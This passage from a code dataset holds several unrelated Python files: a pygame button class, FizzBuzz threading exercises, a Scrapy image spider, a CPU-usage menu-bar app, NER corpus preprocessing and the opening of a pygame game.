output\n","sub_path":"apollo/backend/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"443239083","text":"# coding: cp949\nfrom pico2d import *\n\nimport Manager_Sound\n\nclass Button:\n def __init__(self, _x, _y, _type):\n self.buttonType = _type\n self.X ,self.Y = _x, _y\n self.mouseX, self.mouseY = 0, 0\n self.events = None;\n #충돌인지 아닌지 체크하는 부분과 이미지\n self.frame = 0\n self.isFirst = False\n\n def __del__(self):\n self.exit()\n\n def enter(self):\n #버튼의 종류를 인식(1.시작버튼 2.맵선택1 3.맵선택2 4.나가기 5~8.로비아이템수증가)\n if self.buttonType == 1:\n self.sizeX, self.sizeY = 192, 55\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Lobby_Button_Start.png')\n elif self.buttonType == 2:\n self.sizeX, self.sizeY = 135, 21\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Loddy_Image_SelectMap_0.png')\n elif self.buttonType == 3:\n self.sizeX, self.sizeY = 135, 21\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Loddy_Image_SelectMap_1.png')\n elif self.buttonType == 4:\n self.sizeX, self.sizeY = 140, 32\n self.buttonImage = load_image('.\\\\Sprite\\\\03.InGame\\\\InGame_Button_Out.png')\n elif self.buttonType == 5:\n self.sizeX, self.sizeY = 33, 26\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Lobby_QButton.bmp')\n elif self.buttonType == 6:\n self.sizeX, self.sizeY = 33, 26\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Lobby_WButton.bmp')\n elif self.buttonType == 7:\n self.sizeX, self.sizeY = 33, 26\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Lobby_EButton.bmp')\n elif self.buttonType == 8:\n self.sizeX, self.sizeY = 33, 26\n self.buttonImage = load_image('.\\\\Sprite\\\\02.Lobby\\\\Lobby_RButton.bmp')\n\n def exit(self):\n del (self.buttonImage)\n\n def update(self, _events):\n if (((self.X - self.sizeX / 2) < self.mouseX) and ((self.X + self.sizeX / 2) > self.mouseX)) \\\n and (((self.Y - self.sizeY / 2) < (600 - self.mouseY)) and ((self.Y + self.sizeY / 2) > (600 - self.mouseY))):\n self.frame = 1\n if self.isFirst == False:\n self.isFirst = True\n Manager_Sound.PlayEffectSound('BUTTON_ON')\n else:\n 
self.frame = 0\n if self.isFirst == True:\n self.isFirst = False\n Manager_Sound.PlayEffectSound('BUTTON_OFF')\n\n # 키의 종류에 따라서 달라지는 리턴값들\n if(self.keycheck(_events)):\n return self.buttonType\n\n def draw(self):\n #프레임이 시작하는 그림에서의 X좌표, Y좌표(Y좌표는 아래서부터 1) => 왼쪽 아래부터 오른쪽 위까지 하나를 그림\n if (self.buttonType == 1) or (self.buttonType == 4):\n self.buttonImage.clip_draw((self.frame * self.sizeX), 0,\n self.sizeX, self.sizeY,\n self.X, self.Y)\n elif (self.buttonType == 2) or (self.buttonType == 3):\n self.buttonImage.clip_draw(((self.frame - 1) * self.sizeX), 0,\n self.sizeX, self.sizeY,\n self.X, self.Y)\n elif (self.buttonType >= 5) and (self.buttonType <= 8):\n self.buttonImage.clip_draw(0, 0,\n self.sizeX, self.sizeY,\n self.X, self.Y)\n\n def keycheck(self, _events):\n # 마우스값을 받음\n self.events = _events\n\n for event in self.events:\n if event.type == SDL_MOUSEMOTION:\n self.mouseX, self.mouseY = event.x, event.y\n if (event.type, self.frame) == (SDL_MOUSEBUTTONUP, 1):\n Manager_Sound.PlayEffectSound('EMPTY_ON')\n return True","sub_path":"CrazyArcade_Packaging/Object_Button.py","file_name":"Object_Button.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"67852552","text":"'''\n编写一个可以从 1 到 n 输出代表这个数字的字符串的程序,但是:\n\n如果这个数字可以被 3 整除,输出 \"fizz\"。\n如果这个数字可以被 5 整除,输出 \"buzz\"。\n如果这个数字可以同时被 3 和 5 整除,输出 \"fizzbuzz\"。\n例如,当 n = 15,输出: 1, 2, fizz, 4, buzz, fizz, 7, 8, fizz, buzz, 11, fizz, 13, 14, fizzbuzz。\n\n假设有这么一个类:\n\nclass FizzBuzz {\n  public FizzBuzz(int n) { ... }  // constructor\n public void fizz(printFizz) { ... } // only output \"fizz\"\n public void buzz(printBuzz) { ... } // only output \"buzz\"\n public void fizzbuzz(printFizzBuzz) { ... } // only output \"fizzbuzz\"\n public void number(printNumber) { ... 
} // only output the numbers\n}\n请你实现一个有四个线程的多线程版  FizzBuzz, 同一个 FizzBuzz 实例会被如下四个线程使用:\n\n线程A将调用 fizz() 来判断是否能被 3 整除,如果可以,则输出 fizz。\n线程B将调用 buzz() 来判断是否能被 5 整除,如果可以,则输出 buzz。\n线程C将调用 fizzbuzz() 来判断是否同时能被 3 和 5 整除,如果可以,则输出 fizzbuzz。\n线程D将调用 number() 来实现输出既不能被 3 整除也不能被 5 整除的数字。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/fizz-buzz-multithreaded\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\nfrom threading import Thread, Condition\n\n''' Condition解法\n'''\ndef fizz():\n while True:\n if con1.acquire():\n con1.wait()\n print('fizz')\n con1.notify()\n\ndef buzz():\n while True:\n if con2.acquire():\n con2.wait()\n print('buzz')\n con2.notify()\n\ndef fizzbuzz():\n while True:\n if con3.acquire():\n con3.wait()\n print('fizzbuzz')\n con3.notify()\n\ndef number():\n while True:\n if con4.acquire():\n con4.wait()\n print(n)\n con4.notify()\n\ncon1 = Condition()\ncon2 = Condition()\ncon3 = Condition()\ncon4 = Condition()\nn=0\n\nif __name__ == '__main__':\n t1 = Thread(target=fizz)\n t2 = Thread(target=buzz)\n t3 = Thread(target=fizzbuzz)\n t4 = Thread(target=number)\n t1.start()\n t2.start()\n t3.start()\n t4.start()\n with con1,con2,con3,con4:\n for i in range(1,16):\n n=i\n if i%3==0 and i%5==0:\n con3.notify()\n con3.wait()\n elif i%3==0:\n con1.notify()\n con1.wait()\n elif i%5==0:\n con2.notify()\n con2.wait()\n else:\n con4.notify()\n con4.wait()\n\n''' Semaphore解法\ndef fizz():\n while True:\n if con1.acquire():\n print('fizz')\n con.release()\n\ndef buzz():\n while True:\n if con2.acquire():\n print('buzz')\n con.release()\n\ndef fizzbuzz():\n while True:\n if con3.acquire():\n print('fizzbuzz')\n con.release()\n\ndef number():\n while True:\n if con4.acquire():\n print(n)\n con.release()\n\ncon1 = Semaphore(0)\ncon2 = Semaphore(0)\ncon3 = Semaphore(0)\ncon4 = Semaphore(0)\ncon = Semaphore(1)\nn=0\n\nif __name__ == '__main__':\n\n t1 = Thread(target=fizz)\n t2 = Thread(target=buzz)\n t3 = Thread(target=fizzbuzz)\n t4 = Thread(target=number)\n t1.start()\n t2.start()\n t3.start()\n t4.start()\n\n for i in range(1,16):\n con.acquire()\n n=i\n if i%3==0 and i%5==0:\n con3.release()\n elif i%3==0:\n con1.release()\n elif i%5==0:\n con2.release()\n else:\n con4.release()\n'''\n\n''' Queue解法\ndef fizz():\n while True:\n if q1.get():\n print('fizz')\n q.put(1)\n\ndef buzz():\n while True:\n if q2.get():\n print('buzz')\n q.put(1)\n\ndef fizzbuzz():\n while True:\n if q3.get():\n print('fizzbuzz')\n q.put(1)\n\ndef number():\n while True:\n if q4.get():\n print(n)\n q.put(1)\n\nq1 = Queue()\nq2 = Queue()\nq3 = Queue()\nq4 = Queue()\nq = Queue()\nn=0\n\nif __name__ == '__main__':\n\n t1 = Thread(target=fizz)\n t2 = Thread(target=buzz)\n t3 = Thread(target=fizzbuzz)\n t4 = Thread(target=number)\n t1.start()\n t2.start()\n t3.start()\n t4.start()\n q.put(1)\n\n for i in range(1,16):\n q.get()\n n=i\n if i%3==0 and i%5==0:\n q3.put(1)\n elif i%3==0:\n q1.put(1)\n elif i%5==0:\n q2.put(1)\n else:\n q4.put(1)\n'''","sub_path":"多线程/交替打印字符串.py","file_name":"交替打印字符串.py","file_ext":"py","file_size_in_byte":4780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"99556378","text":"# ちーともわからんので解説見た\n# ら、悔しさあふれる感じ\n# NGになる文字の並びは限定される。3文字のものは\"ACG\" \"GAC\", 4文字のものは\"AxGC\", \"AGxC\"\n# ここで, \"AAGC\"とか\"AGCC\"なんてのを考え出すと「すでに\"AGC\"が含まれとるやんけ」->(だから何?)みたいなよくわからん思考に陥ってしまった\n# (いまみてるのとそれ以前の3つを保存して探索すると結局かぶらず全探索できるので考えなくていい)\n\n# n = input()\n\n# なんで???????????\n# これが無限ループになるの????????????????\n# は???????????????????????????\n# def f(i, s):\n# if i == n:\n# 
return 1\n# # print(\"now s : {}\".format(s))\n# ret = 0\n# for c in \"ACGT\":\n# print(s + c)\n# is_include = True if \"AGC\" in s + c else False\n# if is_include:\n# continue\n# ret += f(i + 1, s[1:] + c)\n# return ret\n# print(f(0, \"xxx\"))\n# coding: utf-8\n# Your code here!\n\nn = int(input())\nmemo = {}\n\n\ndef f(i, s):\n if (i, s) in memo:\n return memo[(i, s)]\n if i == n:\n return 1\n ret = 0\n for c in \"AGCT\":\n flag = False\n for j in range(4):\n t = list(s + c)\n if j >= 1:\n t[j], t[j - 1] = t[j - 1], t[j]\n if \"AGC\" in \"\".join(t):\n flag = True\n if not flag:\n ret += f(i + 1, s[1:] + c)\n ret %= 10 ** 9 + 7\n memo[(i, s)] = ret\n return ret\n\n\nprint(f(0, \"TTT\"))\n","sub_path":"Python_codes/p03088/s920695048.py","file_name":"s920695048.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"216336898","text":"#-*- coding:utf-8 -*-\nimport rumps\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport psutil #cpu��用率の取得用\nimport tempfile\nimport shutil\nimport os\n\nclass CpuUsageApp(rumps.App):\n\n def __init__(self):\n super(CpuUsageApp, self).__init__(\"CPU Usage App\")\n rumps.debug_mode(False)\n self.menu = ['Show text']\n self.enable_text = True\n\n #CPU使用率グラフ作成\n self.time = np.arange(10)\n self.usage = np.zeros_like(self.time)\n self.fig = plt.figure(figsize=(1, 1), dpi=100)\n self.ax = self.fig.add_subplot(111)\n self.ax.set_xlim(0, 9)\n self.ax.set_ylim(0, 100)\n self.line, = self.ax.plot(self.time, self.usage, lw=3)\n self.canvas = self.fig.canvas\n self.axes = self.line.axes\n plt.axis('off')\n\n #iconは一時保存ディレクトリに入れてアプリ終了後に消す\n self.tmp_dir = tempfile.mkdtemp()\n self.img_path = os.path.join(self.tmp_dir, 'cpu_usage.png')\n plt.savefig(self.img_path, transparent=True, dpi=100)\n\n #iconをセット\n self.icon = self.img_path\n\n def __del__(self):\n shutil.rmtree(self.tmp_dir)\n\n #テキスト表示の有無\n @rumps.clicked(\"Show text\")\n def show_text(self, sender):\n self.enable_text = not self.enable_text\n sender.state = self.enable_text\n if not self.enable_text:\n self.title = None\n\n #1秒毎に更新\n @rumps.timer(1)\n def update(self, _):\n #CPU使用率取得\n usage = psutil.cpu_percent()\n self.usage = np.roll(self.usage, 1)\n self.usage[0] = usage\n #左へ遷移するよう配列を反転\n self.line.set_ydata(self.usage[::-1])\n #線を更新\n self.axes.draw_artist(self.line)\n self.canvas.blit(self.axes.bbox)\n #iconファイル出力\n plt.savefig(self.img_path, transparent=True, dpi=100)\n self.icon = self.img_path\n\n #テキスト表示\n if self.enable_text:\n self.title = ' '+str(self.usage[0])+' %' if self.usage[0]<10 else str(self.usage[0])+' %'\n\nif __name__ == \"__main__\":\n app = CpuUsageApp()\n app.run()\n","sub_path":"osx/Applications/CpuUsageApp/CpuUsageApp.py","file_name":"CpuUsageApp.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"601652984","text":"import scrapy\nfrom getteamimages.items import GetteamimagesItem\n\nclass AllteamimgSpider(scrapy.Spider):\n name = \"allteamimg\"\n allowd_domains = [\"dribbble.com\"]\n start_urls = [\"https://dribbble.com/teams\"]\n dn = \"https://dribbble.com\"\n\n def parse(self, response):\n links = response.css('a[class=url]::attr(href)').extract()\n for link in links:\n url = self.dn + link\n yield scrapy.Request(url, callback=self.etparse)\n\n nextpgs = response.css('a[class=next_page]::attr(href)').extract()\n for nextpg in nextpgs:\n nextpgurl = 
'https://dribbble.com'+nextpg\n yield scrapy.Request(nextpgurl , callback=self.parse) \n\n\n\n def etparse(self, response):\n srcs = response.css('div[class=dribbble-img]').css('img::attr(src)').extract()\n \n for src in srcs:\n if src[(len(src)-4):] == '.png':\n item = GetteamimagesItem()\n item['imagelink'] = src[:(len(src)-len('_teaser.png'))]+'.png' \n item['imageid'] = src.split('/')[6]\n yield item\n\n links = response.css('a[class=next_page]::attr(href)').extract()\n for link in links:\n newurl = 'https://dribbble.com'+link\n yield scrapy.Request(newurl , callback=self.etparse) \n\n\n\n\n \n\n","sub_path":"python/imagecrawler/getteamimages/getteamimages/spiders/allteamimg.py","file_name":"allteamimg.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"281032161","text":"#This script is designed to be python 2.7 and 3.3 compatible\n\nimport sys, os, time\n\nprint(\"Hello from Python!\")\nsys.stdout.flush()\n\nvalue = 0\nwhile (1):\n#\n\ttime.sleep(1)\n\tprint(\"Value = %u\" % value)\n\tvalue += 1\n\tsys.stdout.flush()\n\t\n\tif (value >= 4): break\n#","sub_path":"data/ConstPort.app/Contents/MacOS/Resources/Scripts/testScript.py","file_name":"testScript.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"56240833","text":"\"\"\"\nWrite a definition for twenty_three_and_me such that it prints the family\n\t- Accomplish this using the outputGeneratio method and recursion\n\"\"\"\n\nimport random\n\nclass AlphaParent(object):\n\n\tdef __init__(self, eye_color, hair_color):\n\t\tself.eyes = eye_color\n\t\tself.hair = hair_color\n\tdef __add__(self, mate):\n\t\treturn Child(self,mate)\n\t\n\tdef __str__(self):\n\t\treturn \"{} hair - {} eyes\".format(self.hair, self.eyes)\n\nclass Child(AlphaParent):\n\n\tdef __init__(self, mom, dad):\n\t\tself.mom = mom\n\t\tself.dad = dad\n\t\tself.eyes = random.choice([mom.eyes, dad.eyes])\n\t\tself.hair = random.choice([mom.hair, dad.hair])\n\t\n\tdef twenty_three_and_me(self, great = -1):\n\n\t\tif not (isinstance(self.mom,Child) and isinstance(self.dad, Child)):\n\t\t\tself.outputGeneration(self.mom, self.dad, great)\n\n\t\telse:\n\t\t\tself.dad.twenty_three_and_me(great + 1)\n\t\t\tself.mom.twenty_three_and_me(great + 1)\n\t\t\tself.outputGeneration(self.mom, self.dad, great)\n\n\tdef outputGeneration(self, mom, dad, great):\n\t\n\t\tif(great > 0):\n\t\t\tprint(\"Great\" * great, \"GrandFather:\", dad)\n\t\t\tprint(\"Great\" * great, \"GrandMother:\", mom)\n\t\tif great == 0:\n\t\t\tprint(\"GrandFather:\", dad)\n\t\t\tprint(\"GrandMother:\", mom)\n\t\tif great == -1:\n\t\t\tprint(\"Father:\", dad)\n\t\t\tprint(\"Mother:\", mom)\n\nif __name__ == \"__main__\":\n \n a1 = AlphaParent(\"Blue\", \"Blonde\")\n a2 = AlphaParent(\"Brown\", \"Burnette\")\n a3 = AlphaParent(\"Blue\", \"Red\")\n a4 = AlphaParent(\"Blue\", \"Burnette\")\n\n b1 = a1 + a2\n b2 = a3 + a4\n\n c1 = b1 + b2\n\n\n c1.twenty_three_and_me()\n print()\n print(c1)","sub_path":"Recursion/breeding_class_w_recursion.py","file_name":"breeding_class_w_recursion.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"238550210","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy import integrate\n\nl = 1\n\n\n\nd = 0\n\n\n\ndef I(o):\n\n def I(q):\n g = o - d + q**2/2\n\n cc = 
(1+2*g)/(2*q)\n dd = np.sqrt( np.abs(2*g) )/q\n\n def a(x):\n r1 = q*x + np.sqrt( np.abs(q**2*x**2-2*g) )\n r2 = q*x - np.sqrt( np.abs(q**2*x**2-2*g) )\n a = 1/(r1 -r2) * \\\n (\\\n np.heaviside(-g,0) * np.heaviside(cc-x,0) * r1**2 \\\n +np.heaviside( g,0) * np.heaviside(x-dd,0) * np.heaviside(x,0)\\\n *( np.heaviside(cc-x,0)*r1**2 + r2**2 )\\\n )\n return a\n A, err = integrate.quad(a, -1, 1)\n A = np.pi*A\n\n def b(x):\n r1 = q*x + np.sqrt( np.abs(q**2*x**2-2*g) )\n r2 = q*x - np.sqrt( np.abs(q**2*x**2-2*g) )\n\n cc = (1+2*g)/(2*q)\n dd = np.sqrt( np.abs(2*g) )/q\n\n\n noroot = np.heaviside(g,0)*np.heaviside(dd-x,0) # no root heaviside\n root = np.heaviside(-g,0) + \\\n np.heaviside(g,0)*np.heaviside(x-dd,0) # root heaviside\n\n bnoroot11 = np.arctan( (1-q*x)/np.sqrt(np.abs(2*g-q**2*x**2 ) ) )\n bnoroot12 = np.arctan( ( -q*x)/np.sqrt(np.abs(2*g-q**2*x**2 ) ) )\n bnoroot1 = (-4*g)/ (2*g - q**2*x**2)*(bnoroot11 - bnoroot12)\n bnoroot2 = 2*q*x*np.log( np.abs( (.5-q*x+g)/g ) )\n bnoroot = bnoroot1 + bnoroot2\n\n broot1 = -2*g/(r1-r2) * np.log( np.abs((r2*(1-r1))/(r1*(1-r2))) )\n broot2 = 2*q*x/(r1-r2) * \\\n (r1*np.log( np.abs(1/r1-1) ) - r2*np.log( np.abs(1/r2-1) ) )\n broot = broot1 + broot2\n\n b = 2 + noroot*bnoroot +root*broot\n return b\n B, err = integrate.quad(b, -1, 1)\n\n I = l**2*A * ( (o-l**2*B)**2 + l**4*A**2 ) *q**2\n return I\n I, err = integrate.quad(I, 0, 1)\n return I\n\nN = 3\no = np.linspace(-2, 2, N)\nII = np.linspace(0, 0, N)\nfor i in range (N):\n II[i] = I(o[i])\n print(i)\n\nprint(II)\n","sub_path":"source/posts/2019-02-21-physics-RF谱PRA文献重复/flycheck_t0anyl2-NSConflict-王泽庆-linux4.20.15-1-MANJARO.py","file_name":"flycheck_t0anyl2-NSConflict-王泽庆-linux4.20.15-1-MANJARO.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"262570682","text":"# -*-coding:utf-8-*-\nimport os\nimport re\nimport pickle\nimport numpy as np\nimport pandas as pd\n\n\nclass Data:\n def __init__(self, args):\n self.corpus_path = args.corpus_path\n self.train_path = args.train_path\n self.test_path = args.test_path\n self.vocab_path = args.vocab_path\n self.embedding_dim = args.hidden_dim\n\n\n # 语料库预处理\n def tag_line(self, words):\n # 对应字数组\n chars = []\n # 字数组对应标签\n tags = []\n temp_word = '' # 用于合并组合词([]中的组合词)\n # print(\"+==============+++++++++++++++++++++++++++++++++++++=\")\n for word in words:\n # print(word)\n if word == \"/w\": continue # 去除因分句剩下的标点的标注\n word = word.strip('\\t ') # 如:迈向/v\n if temp_word == '':\n bracket_pos = word.find('[') # [ ]ns\n w = word.split('/')[0] # w:词;h:词性\n if bracket_pos == -1: # 没有'['\n if len(w) == 0: continue\n chars.extend(w) # 加入数组\n # if h == 'ns': # 词性为地名\n # 单字词:+S;非单字词:+B(实体首部)、M*(len(w)-2)(实体中部)、E(实体尾部)\n tags += ['S'] if len(w) == 1 else ['B'] + ['M'] * (len(w) - 2) + ['E']\n else: # 有'['\n # 获取'['后的词\n w = w[bracket_pos + 1:]\n temp_word += w\n else:\n bracket_pos = word.find(']')\n w = word.split('/')[0]\n if bracket_pos == -1:\n temp_word += w\n else:\n w = temp_word + w\n h = word[bracket_pos + 1:]\n temp_word = ''\n if len(w) == 0: continue\n chars.extend(w)\n # if h == 'ns':\n tags += ['S'] if len(w) == 1 else ['B'] + ['M'] * (len(w) - 2) + ['E']\n\n assert temp_word == ''\n return (chars, tags)\n\n # 中文分句\n def cut_sentence(self, sentence):\n sentence_list = re.split(\"。|!|\\!|?|\\?\", sentence)\n return sentence_list\n\n # 加载语料库\n def load_corpus(self):\n data = []\n train_data = []\n test_data = []\n pos = 0\n with open(self.corpus_path, 
encoding='utf-8') as corpus_f:\n # open(self.train_path, encoding=\"utf-8\") as train_f, \\\n # open(self.test_path, encoding=\"utf-8\") as test_f:\n for line in corpus_f:\n line = line.strip('\\r\\n\\t')\n sentence = self.cut_sentence(line)\n if sentence == '': continue\n for sent in sentence:\n # 去除每行开始时间\n if len(sent.split()) <= 1: continue # 过滤空字符和仅有分句的标点符号\n if sent.split()[0].split(\"/\")[1] == 't':\n words = sent.split()[1:] # 获取每行第1个及后面元素(去除每行开始时间)\n else:\n words = sent.split()\n\n # line_chars:名 ;line_tags:对应标签(B/M/S/O)\n line_chars, line_tags = self.tag_line(words)\n data.append((line_chars, line_tags))\n\n # 抽样20%作为测试集使用\n if pos % 5 == 0:\n test_data.append((line_chars, line_tags))\n else:\n train_data.append((line_chars, line_tags))\n # isTest = True if pos % 5 == 0 else False\n # saveObj = test_f if isTest else train_f\n # for k, v in enumerate(line_chars):\n # saveObj.write(v + '\\t' + line_tags[k] + '\\n')\n # saveObj.write('\\n')\n pos += 1\n return data, train_data, test_data\n\n # 建立词汇表\n def vocab_build(self):\n data, _, _ = self.load_corpus()\n word2id = {}\n\n # 统计词频, 并设置索引\n for words, tags in data:\n for word in words:\n if word not in word2id:\n word2id[word] = [len(word2id)+1, 1]\n else:\n word2id[word][1] += 1\n\n # 筛选出低频词,并删除\n low_freq_words = []\n for word, [word_index, word_freq] in word2id.items():\n if word_freq < 1:\n low_freq_words.append(word)\n for word in low_freq_words:\n del word2id[word]\n\n new_index = 1\n for word in word2id.keys():\n word2id[word] = new_index\n new_index += 1\n with open(self.vocab_path, 'wb') as fw:\n pickle.dump(word2id, fw)\n return word2id\n\n # 读取词汇表\n def read_vocab(self):\n with open(self.vocab_path, \"rb\") as fn:\n word2id = pickle.load(fn)\n print(\"vocab size:\", len(word2id))\n return word2id\n\n\n # 生成词向量\n def random_embedding(self, word2id):\n \"\"\"\n 随机生成词嵌入,范围[-0.25, 0.25], shape = [词汇数量,embedding_dim]\n vocab : 词汇表\n embedding_dim : 词嵌入纬度\n \"\"\"\n embedding_mat = np.random.uniform(-0.25, 0.25, (len(word2id), self.embedding_dim))\n embedding_mat = np.float32(embedding_mat)\n return embedding_mat\n ## 预训练词向量\n\n\n # 句子在词汇表中的id\n def sentence2id(self, sent, word2id):\n sentence_id = []\n for word in sent:\n if word not in word2id:\n word = ''\n sentence_id.append(word2id[word])\n return sentence_id\n\n def pad_sequences(self, sequences, pad_mark=0):\n # 句子的最大长度\n max_len = max(map(lambda x: len(x), sequences))\n seq_list, seq_len_list = [], []\n for seq in sequences:\n seq = list(seq)\n seq_ = seq[:max_len] + [pad_mark] * max(max_len - len(seq), 0)\n seq_list.append(seq_)\n seq_len_list.append(min(len(seq), max_len))\n return seq_list, seq_len_list\n\n\n # 将句子转化为对应的词id,标注转化为对应的数字\n def batch_yield(self, data, batch_size, word2id, tag2label, shuffle=False):\n if shuffle:\n np.random.shuffle(data)\n\n seqs, labels = [], []\n for (sent_, tag_) in data:\n sent_id = self.sentence2id(sent_, word2id)\n label_id = [tag2label[tag] for tag in tag_]\n\n if len(seqs) == batch_size:\n yield seqs, labels\n seqs, labels = [], []\n\n seqs.append(sent_id)\n labels.append(label_id)\n\n if len(seqs) != 0:\n yield seqs, labels\n\n\n\n\nif __name__==\"__main__\":\n dd = Data(\"data/2014_corpus.txt\")\n data, _, _ = dd.load_corpus()\n # print(data)\n # dd.vocab_build() # 建立词汇表\n with open(\"word2id.pkl\", 'rb') as fr:\n word2id = pickle.load(fr)\n print(word2id)\n\n # 生成随机向量\n embedding_mat = dd.random_embedding(word2id)\n # 根据词汇表生成句子对应的word_id\n sentence_id = dd.sentence2id(\"我爱北京天安门\", word2id)\n 
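# --- aside: what pad_sequences above produces, as a standalone sketch (same
# logic, no class needed): pad each id sequence to the batch maximum with
# pad_mark and record the true lengths for the downstream BiLSTM.
def pad_sequences(sequences, pad_mark=0):
    max_len = max(len(s) for s in sequences)
    seq_list, seq_len_list = [], []
    for seq in sequences:
        seq_list.append(list(seq) + [pad_mark] * (max_len - len(seq)))
        seq_len_list.append(len(seq))
    return seq_list, seq_len_list

batch = [[4, 8, 15], [16, 23], [42]]
padded, lengths = pad_sequences(batch)
print(padded)   # [[4, 8, 15], [16, 23, 0], [42, 0, 0]]
print(lengths)  # [3, 2, 1]
# --- end aside ---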
print(sentence_id)\n\n\n\n","sub_path":"BiLSTM-CRF/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"641294993","text":"from fly.fly_main import *\n\n\ndef request(url, data=None):\n \"\"\"обёртка запроса в try\"\"\"\n try:\n req = requests.get(url, data=data)\n except requests.exceptions.RequestException as ex:\n exit_message('запрос упал ' + str(ex))\n else:\n if req.status_code not in range(200, 300):\n exit_message('ответ сервера ' + str(req.status_code))\n return req\n\n\nif __name__ == '__main__':\n payload = {\n # 'search': 'Search!',\n # 'reserve-type': 'return',\n 'rt': '',\n 'lang': 'en',\n 'depdate': '09.07.2019',\n 'aptcode1': 'CPH',\n 'rtdate': '13.07.2019',\n 'aptcode2': 'VAR',\n 'paxcount': 1,\n 'infcount': ''\n\n }\n\n # text = request('https://apps.penguin.bg/fly/quote3.aspx', data=payload)\n text = requests.get('https://apps.penguin.bg/fly/quote3.aspx', params=payload, verify=False)\n print('url ', text.url)\n print(text.text)\n with open('temp.htm', 'w') as file:\n file.write(text.text)\n","sub_path":"temp_request.py","file_name":"temp_request.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"548735878","text":"\r\nimport pygame\r\nimport random\r\nimport time\r\nfrom Nastavenia import nastavenia\r\nfrom ObjektyMapa import mapa\r\nfrom Postavy import hrac\r\nimport ObjektyMapa.infObjekty as infObjekty\r\nimport logging\r\nimport Menu.oknoInventar as oknoInventar\r\nimport Menu.enumOknaHra as enumOknaHra\r\nimport Textury.textury as textury\r\nimport math\r\nfrom Textury import enumTextura\r\nimport Crafting.recepty as recepty\r\nfrom Menu.enumOknaHra import EnumOknaHra\r\n\r\n\r\n\r\n\r\n\r\n\r\n'''\r\nzakladna trieda pre okno hry\r\n'''\r\nclass Hra:\r\n def __init__(self,manazerOkien, screen, textury,vlastnosti,typP):\r\n self.manazerOkien = manazerOkien\r\n scale = nastavenia.ROZLISENIA_X[nastavenia.vybrateRozlisenie]/1280\r\n self.screen = screen\r\n #nacitat mapu a tak\r\n self.timeUP = time.time()+1\r\n \r\n self.pocetFPS = 60\r\n self.fpsCount = 0\r\n \r\n self.pocetTPS = nastavenia.RYCHLOST_HRY\r\n self.tpsCount = 0\r\n \r\n self.pocetTickov = 0\r\n \r\n self.allSprites = pygame.sprite.Group()\r\n self.aktivBlitObjMapa = pygame.sprite.LayeredUpdates()\r\n self.postavyGroup = pygame.sprite.Group()\r\n self.mobky = pygame.sprite.Group()\r\n self.mobkyNahanajuceHraca = pygame.sprite.Group()\r\n self.polickaSprites = pygame.sprite.Group()\r\n self.mrtvePostavy = pygame.sprite.Group()\r\n \r\n self.hrac = hrac.Hrac(self,[0,0],typP,textury,vlastnosti,48,48)\r\n \r\n logging.info(\"Vytvorenie mapy\")\r\n self.mapa = mapa.Mapa(self)\r\n \r\n self.hrac.linkMapa(self.mapa)\r\n \r\n recepty.initRecepty(self.hrac)\r\n \r\n logging.info(\"inicializacia mapy\")\r\n self.hrac.update()\r\n \r\n self.initInformacieOHracovi(scale)\r\n self.invOknoRychlyPristup.reinit(self.hrac.dajInventarRychlyPristup())\r\n self.manazerOkien.dajOknoHra(enumOknaHra.EnumOknaHra.INVENTAR).vlozOkno(self.invOknoRychlyPristup)\r\n \r\n\r\n self.casovanieModulo = 0\r\n \r\n \r\n self.aktivBlitObjMapa.draw(self.screen)\r\n self.updateHluku()\r\n #pygame.display.flip()\r\n \r\n self.casNextUpdateStavNpc = 0\r\n\r\n \r\n self.initTime = time.time()\r\n \r\n\r\n \r\n def dajMrtvePostavy(self):\r\n return self.mrtvePostavy\r\n \r\n \r\n def 
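# --- aside: the request() wrapper above passes data= to a GET while the live
# call uses params=; for a GET it is params that builds the query string. The
# manual range(200, 300) status test can also lean on raise_for_status().
# A sketch of the tightened wrapper:
import requests

def fetch(url, params=None, timeout=10):
    try:
        resp = requests.get(url, params=params, timeout=timeout)
        resp.raise_for_status()  # raises HTTPError on 4xx/5xx responses
    except requests.exceptions.RequestException as ex:
        raise SystemExit('request failed: ' + str(ex))
    return resp
# --- end aside ---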
